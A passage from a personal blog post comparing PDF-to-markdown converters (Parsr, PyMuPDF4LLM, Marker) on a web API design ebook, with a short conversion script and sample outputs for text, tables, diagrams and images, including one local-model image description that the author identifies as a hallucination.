wrote (well, Claude mostly wrote) a very simple script: #!/usr/bin/env -S uv run # /// script # requires-python = "&gt;=3.8" # dependencies = [ # "pymupdf4llm", # ] # /// import sys import pathlib import pymupdf4llm def convert_pdf_to_markdown(pdf_path, output_path): md_text = pymupdf4llm.to_markdown(pdf_path) pathlib.Path(output_path).write_bytes(md_text.encode()) return output_path def main(): pdf_file = sys.argv[1] output_file = sys.argv[2] convert_pdf_to_markdown(pdf_file, output_file) if __name__ == "__main__": main() (Claude’s script had more logging and error checking, I’ve trimmed it down for this blog) This was very fast by comparison with the others - the same 12MB file took 28 seconds to convert! The output wasn’t great - but it was probably fine for LLM summaries, if you don’t mind losing some sense of the content of tables, and skipping images almost entirely. What did I use as a test document? I used “The Design of Web APIs” by Arnaud Lauret as my test document. The choice was somewhat random - I had it in my ebook collection, and it seemed like a good mix of text, diagrams, code samples, and tables that would test the various parsing tools. The PDF was 12MB in size, with 396 pages and a nice mix of text, diagrams, code snippets and tables. Output comparison Basic text Basic text shouldn’t be too hard, you’d think. Here is a sample from the ebook: Parsr handled this relatively OK, but it didn’t handle words split by a line ending at all well: What do people do when they shop online? Well, they buy some products. And how do they buy these products? They add them to their shopping cart and then check out. Nothing new for these two frst questions. Let’s now dig into each step to determine its inputs and outputs. We’ll start with the add products to the cart goal. What do people need to add a prod- uct to a cart? They obviously need a product and a cart. Good, and do they get some- thing in return when they add a product to their cart? No. Well, these new questions do not seem to give us any really useful information; the answers are quite obvious. Maybe we will get something more interesting for the check out step Also, it couldn’t read the word “first”! “Nothing new for these two frst questions” - I guess “first” was using a ligature that the parser didn’t understand? PyMyPdf and Marker both handled hyphenated words at line endings successfully - but both also stumbled on “frst”. (I won’t include samples as they are basically the same as the above, but with “product” and “something” as single words) Code snippets All the tools did a decent job of recognising code snippets - I think they tend to be in a monospace font which makes recognising them easier. Tables Tables are fiddly as they aren’t stored as tabular info in the pdf, just as text with positions: Parsr didn’t cope well with the row separation: HTTP method Action POST (and PUT in creation) GET PATCH/PUT DELETE Create a customer, add a meal to a menu, order goods, start a timer, save a blog post, send a message to customer service, subscribe to a service, sign a contract, open a bank account, upload a photo, share a status on a social network, and so on Read a customer, search for a French restaurant, find new friends, retrieve opened accounts for the last 3 months, download a signed contract, filter best selling books, select black-and-white photos, list friends, and so forth Update a customer, replace goods in an order, switch plane seat, edit an order’s delivery method, change an order’s currency, modify a debit card limit, temporarily block a credit card, and so on Delete a customer, cancel an order, close a case, terminate a process, stop a timer, and so on Marker did much better: HTTP method Action POST (and PUTin creation) Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,send a message to customer service, subscribe to a service, sign a contract, open a bankaccount, upload a photo, share a status on a social network, and so on GET Read a customer, search for a French restaurant, find new friends, retrieve openedaccounts for the last 3 months, download a signed contract, filter best selling books,select black-and-white photos, list friends, and so forth PATCH/PUT Update a customer, replace goods in an order, switch plane seat, edit an order’s deliverymethod, change an order’s currency, modify a debit card limit, temporarily block a creditcard, and so on DELETE Delete a customer, cancel an order, close a case, terminate a process, stop a timer, andso on PyMyPdf was similar to Parsr HTTP method Action POST (and PUTin creation)GETPATCH/PUTDELETE Create a customer, add a meal to a menu, order goods, start a timer, save a blog post,send a message to customer service, subscribe to a service, sign a contract, open a bankaccount, upload a photo, share a status on a social network, and so onRead a customer, search for a French restaurant, fnd new friends, retrieve openedaccounts for the last 3 months, download a signed contract, flter best selling books,select black-and-white photos, list friends, and so forthUpdate a customer, replace goods in an order, switch plane seat, edit an order’s deliverymethod, change an order’s currency, modify a debit card limit, temporarily block a creditcard, and so onDelete a customer, cancel an order, close a case, terminate a process, stop a timer, andso on Images Images it turns out seem to get processed in a few ways depending on the content; and also the tools. Parsr was configured to generate markdown with images, so it sometimes tried to interpret images, and sometimes just copied them - this makes some sense, as if the image is actually a table you’d prefer it to be turned into markdown. Whereas PyMyPdf didn’t really have any explicit handling for images, it would just try to parse them as text; and Marker with the --disable_image_extraction parameter tried to replace images with descriptions if they weren’t otherwise identifiable. I’ll split images into a few key types as they get handled quite differently: Diagrams Diagrams have text and boxes in them - the results were a bit of a mixed bag. Parsr tried to just turn it into text, and didn’t do so well - but it’s still better than the others in this case: What do people want to do when they How do people use an oven? heat food? They heat food Heat food They want to at?a given power at power heat food! for a given duration. for duration Whats Hows Goals Investigate what is done and how it is done... ...to identify goals Marker actually failed to process this one at all. In other cases it did OK with text descriptions, but never great. This was possibly a limitation of the free LLM it used. PyMyPdf also did pretty badly: What do people Investigate what is done and how it is done... ...to identify goals Interestingly, I asked Claude Code to process this same image into a mermaid.js snippet - it’d be very cool to have a pdf parser that could do this, when appropriate: flowchart TB %% Speech bubbles (using stadium shape as approximation) Q1("What do people&lt;br/&gt;want to do when they&lt;br/&gt;use an oven?") Q2("How do people&lt;br/&gt;heat food?") %% White boxes W1[They want to&lt;br/&gt;heat food!] W2[They heat food&lt;br/&gt;at a given power&lt;br/&gt;for a given duration.] %% Black box (goal) G[Heat food&lt;br/&gt;at power&lt;br/&gt;for duration]:::goal %% Bottom boxes Whats[Whats] Hows[Hows] Goals[Goals]:::goal %% Connections Q1 --&gt; W1 Q2 --&gt; W2 W2 --&gt; G %% Bottom flow Whats --&gt; Hows --&gt; Goals %% Vertical connections (dashed) W1 -.-&gt; Whats W2 -.-&gt; Hows G -.-&gt; Goals %% Bottom labels (using invisible nodes for positioning) subgraph bottom [" "] direction LR inv1[Investigate what is done and how it is done...]:::invisible inv2[...to identify goals]:::invisible end %% Styling classDef goal fill:#000,color:#fff classDef invisible fill:transparent,stroke:none %% Hide subgraph box style bottom fill:transparent,stroke:none Screenshots Parsr just saved this as an image - probably the best option for a mixed markdown-and-images output. Marker made a table - this is a decent effort, though given the limitations of markdown tables it couldn’t really make it work. You can also see the limitations of OCR on small text: Q Search Create a money transfer   Authentication This operation allows one to transfer an amount of money from a source account to a destination account. There are three different types of   Transfers$\checkmark$ money transfer:• Immediate – these are executed as soon as the request is received   POST Create a money transfer • Delaved - these are executed upon a given future date· Recurring - these are executed a given occurrences number of times at a given frequency - the first occurrence being executed immediately   COL List money transfers or at a given date   CIT Get a money transfer BankingAPIScopes (transfericreate, transferiadmin)AUTHORIZATIONS   Cancel a money transfer REQUEST BODY SCHEMA: application/json   Beneficiaries string 15 characters /^\d{15}$/sourcerequiredSource account number   Accounts destinationstring 15 characters /^\d{15}$/requiredDestination account number   PyMyPdf, unsurprisingly, didn’t even try with this one. Photos Parsr naturally just saved this as an image. Marker did … poorly: Image /page/22/Picture/1 description: A bar chart titled "Fruit Preference Survey" is shown. The x-axis shows the types of fruits, and the y-axis shows the number of people. The bar chart shows that most people prefer apples, followed by bananas and oranges. 20 people prefer apples, 15 people prefer bananas, and 10 people prefer oranges. I guess the LLM misinterpreted the books and turned them into a barchart hallucination? Not so good, gemma3 model. PyMyPdf didn’t even try to handle the image. Claude Code, by comparison, did a great job - so Marker with a commercial LLM would probably produce something similar: This is a photo of a man with glasses and a beard, wearing a dark blue t-shirt with "RESPECT API GUIDELINES" text on it. He's standing in front of a white bookshelf filled with technical books and what appears to be board games. The person appears to be in a home office or study setting. Conclusion This was a kind-of fun digression. I think it’s pretty clear though that I have basically two (or three?) options here: If I just want an LLM to summarize an ebook that is mostly text, PyMyPdf is fine. It’s fast, easy, and there’s enough context for it to work with. If I want a full markdown version of an ebook, for detailed analysis or copying sections to Obsidian or something, it’d be worth using Marker - though maybe not with the “images as descriptions” setting. Using a free ollama LLM can be fine if I have lots of time, don’t mind some spurious descriptions, and can fiddle models / time. (this needs investigation) But maybe if I wanted something higher quality, it’d be worth using it with a commercial LLM.]]></summary></entry></feed>